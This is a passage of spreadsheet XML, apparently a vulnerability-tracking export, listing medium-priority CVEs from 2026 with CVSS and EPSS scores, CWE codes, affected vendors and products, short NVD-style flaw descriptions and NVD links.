      <c r="D2815" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2815" s="5" t="inlineStr"/>
      <c r="F2815" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2815" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2815" s="5" t="inlineStr"/>
      <c r="I2815" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2815" s="5" t="inlineStr"/>
      <c r="K2815" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2815" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t>
        </is>
      </c>
    </row>
    <row r="2816">
      <c r="A2816" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77898</t>
        </is>
      </c>
      <c r="C2816" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2816" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2816" s="5" t="inlineStr"/>
      <c r="F2816" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2816" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2816" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2816" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2816" s="5" t="inlineStr"/>
      <c r="K2816" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2816" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77898</t>
        </is>
      </c>
    </row>
    <row r="2817">
      <c r="A2817" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78071</t>
        </is>
      </c>
      <c r="C2817" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2817" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2817" s="5" t="inlineStr"/>
      <c r="F2817" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2817" s="5" t="inlineStr"/>
      <c r="H2817" s="5" t="inlineStr"/>
      <c r="I2817" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2817" s="5" t="inlineStr"/>
      <c r="K2817" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2817" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - digital-peak.com - Authenticated, privileged stored XSS in DP Calendar 7.0.0-8.19.5, 9.0.0-10.12.0 - Location title is rendered in data attribute without escaping leads to XSS, needs create permission in DPCalendar.</t>
        </is>
      </c>
      <c r="M2817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78071</t>
        </is>
      </c>
    </row>
    <row r="2818">
      <c r="A2818" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78130</t>
        </is>
      </c>
      <c r="C2818" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2818" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2818" s="5" t="inlineStr"/>
      <c r="F2818" s="5" t="inlineStr"/>
      <c r="G2818" s="5" t="inlineStr"/>
      <c r="H2818" s="5" t="inlineStr"/>
      <c r="I2818" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2818" s="5" t="inlineStr"/>
      <c r="K2818" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2818" s="5" t="inlineStr">
        <is>
          <t>strongSwan 4.2.0 through 6.0.7 has a NULL pointer dereference in the x509 plugin's attribute certificate parser.</t>
        </is>
      </c>
      <c r="M2818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78130</t>
        </is>
      </c>
    </row>
    <row r="2819">
      <c r="A2819" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78132</t>
        </is>
      </c>
      <c r="C2819" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2819" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2819" s="5" t="inlineStr"/>
      <c r="F2819" s="5" t="inlineStr"/>
      <c r="G2819" s="5" t="inlineStr"/>
      <c r="H2819" s="5" t="inlineStr"/>
      <c r="I2819" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2819" s="5" t="inlineStr"/>
      <c r="K2819" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L2819" s="5" t="inlineStr">
        <is>
          <t>strongSwan 5.1.3 through 6.0.7 has an infinite loop in the x509 plugin's attribute certificate parser for ietfAttrSyntax.</t>
        </is>
      </c>
      <c r="M2819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78132</t>
        </is>
      </c>
    </row>
    <row r="2820">
      <c r="A2820" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78133</t>
        </is>
      </c>
      <c r="C2820" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2820" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2820" s="5" t="inlineStr"/>
      <c r="F2820" s="5" t="inlineStr"/>
      <c r="G2820" s="5" t="inlineStr"/>
      <c r="H2820" s="5" t="inlineStr"/>
      <c r="I2820" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2820" s="5" t="inlineStr"/>
      <c r="K2820" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2820" s="5" t="inlineStr">
        <is>
          <t>libcharon in strongSwan 6.0.0 through 6.0.7 has a use-after-free in IKEv2 rekeying collision handling.</t>
        </is>
      </c>
      <c r="M2820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78133</t>
        </is>
      </c>
    </row>
    <row r="2821">
      <c r="A2821" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78480</t>
        </is>
      </c>
      <c r="C2821" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2821" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2821" s="5" t="inlineStr"/>
      <c r="F2821" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2821" s="5" t="inlineStr"/>
      <c r="H2821" s="5" t="inlineStr"/>
      <c r="I2821" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2821" s="5" t="inlineStr"/>
      <c r="K2821" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2821"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M2821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78480</t>
        </is>
      </c>
    </row>
    <row r="2822">
      <c r="A2822" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78490</t>
        </is>
      </c>
      <c r="C2822" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2822" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2822" s="5" t="inlineStr"/>
      <c r="F2822" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2822" s="5" t="inlineStr"/>
      <c r="H2822" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2822" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2822" s="5" t="inlineStr"/>
      <c r="K2822" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L2822" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Restriction of Excessive Authentication Attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to client-side request forgery.</t>
        </is>
      </c>
      <c r="M2822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78490</t>
        </is>
      </c>
    </row>
    <row r="2823">
      <c r="A2823" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78523</t>
        </is>
      </c>
      <c r="C2823" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2823" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2823" s="5" t="inlineStr"/>
      <c r="F2823" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2823" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2823" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2823" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2823" s="5" t="inlineStr"/>
      <c r="K2823" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2823" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78523</t>
        </is>
      </c>
    </row>
    <row r="2824">
      <c r="A2824" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78543</t>
        </is>
      </c>
      <c r="C2824" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2824" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2824" s="5" t="inlineStr"/>
      <c r="F2824" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2824" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2824" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I2824" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2824" s="5" t="inlineStr"/>
      <c r="K2824" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L2824" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a remote attacker to cause a denial of service due to an infinite loop.</t>
        </is>
      </c>
      <c r="M2824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78543</t>
        </is>
      </c>
    </row>
    <row r="2825">
      <c r="A2825" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78574</t>
        </is>
      </c>
      <c r="C2825" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2825" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2825" s="5" t="inlineStr"/>
      <c r="F2825" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2825" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H2825" s="5" t="inlineStr"/>
      <c r="I2825" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2825" s="5" t="inlineStr"/>
      <c r="K2825" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L2825" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M2825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78574</t>
        </is>
      </c>
    </row>
    <row r="2826">
      <c r="A2826" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78837</t>
        </is>
      </c>
      <c r="C2826" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2826" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2826" s="5" t="inlineStr"/>
      <c r="F2826" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2826" s="5" t="inlineStr"/>
      <c r="H2826" s="5" t="inlineStr"/>
      <c r="I2826" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2826" s="5" t="inlineStr"/>
      <c r="K2826" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2826" s="5" t="inlineStr">
        <is>
          <t>A SQL injection vulnerability in the ap_form_{id} parameter in AppNitro MachForm v30 allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="M2826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78837</t>
        </is>
      </c>
    </row>
    <row r="2827">
      <c r="A2827" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79323</t>
        </is>
      </c>
      <c r="C2827" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2827" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2827" s="5" t="inlineStr"/>
      <c r="F2827" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2827" s="5" t="inlineStr"/>
      <c r="H2827" s="5" t="inlineStr">
        <is>
          <t>mageplaza:magefan_blog</t>
        </is>
      </c>
      <c r="I2827" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2827" s="5" t="inlineStr"/>
      <c r="K2827" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2827" s="5" t="inlineStr">
        <is>
          <t>Information disclosure in the blogComments GraphQL query in Magefan Blog GraphQL for Magento 2 (magefan/module-blog-graph-ql) through 2.2.1 allows remote unauthenticated attackers to obtain blog commenter email addresses and internal customer and admin identifiers via a POST request to /graphql.</t>
        </is>
      </c>
      <c r="M2827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79323</t>
        </is>
      </c>
    </row>
    <row r="2828">
      <c r="A2828" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79324</t>
        </is>
      </c>
      <c r="C2828" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2828" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2828" s="5" t="inlineStr"/>
      <c r="F2828" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2828" s="5" t="inlineStr"/>
      <c r="H2828" s="5" t="inlineStr">
        <is>
          <t>mageplaza:gdpr</t>
        </is>
      </c>
      <c r="I2828" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2828" s="5" t="inlineStr"/>
      <c r="K2828" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L2828" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in the Address Delete controller in Mageplaza GDPR for Magento 2 (mageplaza/module-gdpr) through 4.2.9 allows remote unauthenticated attackers to delete any customer's saved address, and to erase all stored addresses by iterating the address id, via a GET request to /customer/address/delete/id/{id}. The controller extends the legacy Action class instead of AbstractAccount, so no authentication, ownership or form key check is enforced.</t>
        </is>
      </c>
      <c r="M2828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79324</t>
        </is>
      </c>
    </row>
    <row r="2829">
      <c r="A2829" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79377</t>
        </is>
      </c>
      <c r="C2829" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2829" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2829" s="5" t="inlineStr"/>
      <c r="F2829" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2829" s="5" t="inlineStr"/>
      <c r="H2829" s="5" t="inlineStr"/>
      <c r="I2829" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2829" s="5" t="inlineStr"/>
      <c r="K2829" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2829" s="5" t="inlineStr">
        <is>
          <t>A heap overflow in the a2dp_decoder_sbc.cpp component of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="M2829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79377</t>
        </is>
      </c>
    </row>
    <row r="2830">
      <c r="A2830" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79378</t>
        </is>
      </c>
      <c r="C2830" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2830" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2830" s="5" t="inlineStr"/>
      <c r="F2830" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2830" s="5" t="inlineStr"/>
      <c r="H2830" s="5" t="inlineStr"/>
      <c r="I2830" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2830" s="5" t="inlineStr"/>
      <c r="K2830" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2830" s="5" t="inlineStr">
        <is>
          <t>An issue in the btm_acl_handle() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="M2830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79378</t>
        </is>
      </c>
    </row>
    <row r="2831">
      <c r="A2831" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79390</t>
        </is>
      </c>
      <c r="C2831" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2831" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2831" s="5" t="inlineStr"/>
      <c r="F2831" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2831" s="5" t="inlineStr"/>
      <c r="H2831" s="5" t="inlineStr"/>
      <c r="I2831" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2831" s="5" t="inlineStr"/>
      <c r="K2831" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2831" s="5" t="inlineStr">
        <is>
          <t>Trueview TI8161 6.0.23.4 is vulnerable to information disclosure due to the transmission of MQTT communications in plaintext over TCP port 1883. An unauthenticated attacker with access to the same network segment can intercept MQTT traffic and obtain sensitive device information and operational data, including device identifiers, message metadata, and control-related information.</t>
        </is>
      </c>
      <c r="M2831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79390</t>
        </is>
      </c>
    </row>
    <row r="2832">
      <c r="A2832" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79407</t>
        </is>
      </c>
      <c r="C2832" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2832" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2832" s="5" t="inlineStr"/>
      <c r="F2832" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2832" s="5" t="inlineStr"/>
      <c r="H2832" s="5" t="inlineStr"/>
      <c r="I2832" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2832" s="5" t="inlineStr"/>
      <c r="K2832" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2832" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability in the SPO extension of MetaGPT 0.8.1 allows an attacker to read arbitrary files via the FILE_NAME value used by set_file_name() and load_meta_data() in metagpt/ext/spo/utils/load.py. The vulnerable code joins the attacker-controlled FILE_NAME value with the settings directory and opens the resulting path without validating that the resolved path remains within the intended directory.</t>
        </is>
      </c>
      <c r="M2832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79407</t>
        </is>
      </c>
    </row>
    <row r="2833">
      <c r="A2833" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79572</t>
        </is>
      </c>
      <c r="C2833" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2833" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2833" s="5" t="inlineStr"/>
      <c r="F2833" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2833" s="5" t="inlineStr"/>
      <c r="H2833" s="5" t="inlineStr"/>
      <c r="I2833" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2833" s="5" t="inlineStr"/>
      <c r="K2833" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L2833" s="5" t="inlineStr">
        <is>
          <t>An XXE (XML External Entity) vulnerability in the level-rule module of Distribution Management v1.0.0 allows attackers to read sensitive files, scan internal networks, or launch server attacks via supplying a crafted XML payload.</t>
        </is>
      </c>
      <c r="M2833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79572</t>
        </is>
      </c>
    </row>
    <row r="2834">
      <c r="A2834" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79575</t>
        </is>
      </c>
      <c r="C2834" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2834" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2834" s="5" t="inlineStr"/>
      <c r="F2834" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2834" s="5" t="inlineStr"/>
      <c r="H2834" s="5" t="inlineStr"/>
      <c r="I2834" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2834" s="5" t="inlineStr"/>
      <c r="K2834" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="L2834" s="5" t="inlineStr">
        <is>
          <t>The JWT signing secret in yfexam-exam v2.0 is derived from the username and the current month instead of a random server-side key, making the secret key easily obtainable via a bruteforce attack.</t>
        </is>
      </c>
      <c r="M2834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79575</t>
        </is>
      </c>
    </row>
    <row r="2835">
      <c r="A2835" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79641</t>
        </is>
      </c>
      <c r="C2835" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2835" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2835" s="5" t="inlineStr"/>
      <c r="F2835" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2835" s="5" t="inlineStr"/>
      <c r="H2835" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2835" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2835" s="5" t="inlineStr"/>
      <c r="K2835" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2835"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elevation of privileges.</t>
        </is>
      </c>
      <c r="M2835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79641</t>
        </is>
      </c>
    </row>
    <row r="2836">
      <c r="A2836" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79734</t>
        </is>
      </c>
      <c r="C2836" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2836" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2836" s="5" t="inlineStr"/>
      <c r="F2836" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2836" s="5" t="inlineStr"/>
      <c r="H2836" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2836" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2836" s="5" t="inlineStr"/>
      <c r="K2836" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2836"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M2836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79734</t>
        </is>
      </c>
    </row>
    <row r="2837">
      <c r="A2837" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79738</t>
        </is>
      </c>
      <c r="C2837" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2837" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2837" s="5" t="inlineStr"/>
      <c r="F2837" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2837" s="5" t="inlineStr"/>
      <c r="H2837" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2837" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2837" s="5" t="inlineStr"/>
      <c r="K2837" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L2837"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M2837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79738</t>
        </is>
      </c>
    </row>
    <row r="2838">
      <c r="A2838" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79740</t>
        </is>
      </c>
      <c r="C2838" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2838" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2838" s="5" t="inlineStr"/>
      <c r="F2838" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2838" s="5" t="inlineStr"/>
      <c r="H2838" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2838" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2838" s="5" t="inlineStr"/>
      <c r="K2838" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L2838"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M2838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79740</t>
